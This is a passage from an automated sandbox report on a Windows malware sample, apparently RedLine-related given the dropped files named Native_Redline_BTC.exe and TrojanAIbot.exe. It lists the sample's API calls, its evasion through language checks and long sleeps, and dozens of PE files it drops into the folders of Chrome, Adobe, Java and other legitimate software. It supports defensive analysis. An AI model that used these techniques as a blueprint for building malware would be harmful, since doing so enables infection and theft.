                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe Code function: 0_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_004375B0
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\build.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        Source: C:\Windows\System32\alg.exe Code function: 5_2_006A52A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 5_2_006A52A0
                        Source: C:\Windows\System32\AppVClient.exe Code function: 11_2_006652A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 11_2_006652A0
                        Source: C:\Windows\System32\FXSSVC.exe Code function: 23_2_006F52A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 23_2_006F52A0
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Code function: 25_2_009952A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 25_2_009952A0
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe Code function: 0_2_00444078 0_2_00444078
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe API/Special instruction interceptor: Address: 538F254
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Memory allocated: 2C20000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Memory allocated: 2E10000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Memory allocated: 4E10000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Memory allocated: 1270000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Memory allocated: 1AE70000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\build.exe Memory allocated: 1570000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\build.exe Memory allocated: 32C0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\build.exe Memory allocated: 30C0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Memory allocated: 1100000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Memory allocated: 2C80000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Memory allocated: 2A80000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Memory allocated: 2520000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Memory allocated: 26E0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Memory allocated: 2520000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Memory allocated: 2BE0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Memory allocated: 2E10000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Memory allocated: 2C30000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Memory allocated: 26F0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Memory allocated: 2930000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Memory allocated: 2740000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Code function: 4_2_00007FF848F34660 sldt word ptr [eax] 4_2_00007FF848F34660
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Window / User API: threadDelayed 4905
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Window / User API: threadDelayed 4814
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7370
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1354
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Window / User API: threadDelayed 7153
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Window / User API: threadDelayed 2636
                        Source: C:\Windows\System32\msdtc.exe Window / User API: threadDelayed 483
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\pingsender.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files\Windows Media Player\wmpnetwk.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files\7-Zip\7z.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\crashreporter.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files\7-Zip\7zG.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Windows\System32\msiexec.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\firefox.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\updater.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
                        Source: C:\Windows\SysWOW64\svchost.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Windows\System32\wbem\WmiApSrv.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7zFM.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Windows\System32\VSSVC.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Windows\System32\SearchIndexer.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\FXSSVC.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\alg.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\AppVClient.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\Desktop\AENiBH7X1q.exe | API coverage: 3.3 %
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480 | Thread sleep time: -38738162554790034s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480 | Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480 | Thread sleep time: -99873s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480 | Thread sleep time: -99762s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480 | Thread sleep time: -99651s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480 | Thread sleep time: -99545s >= -30000s
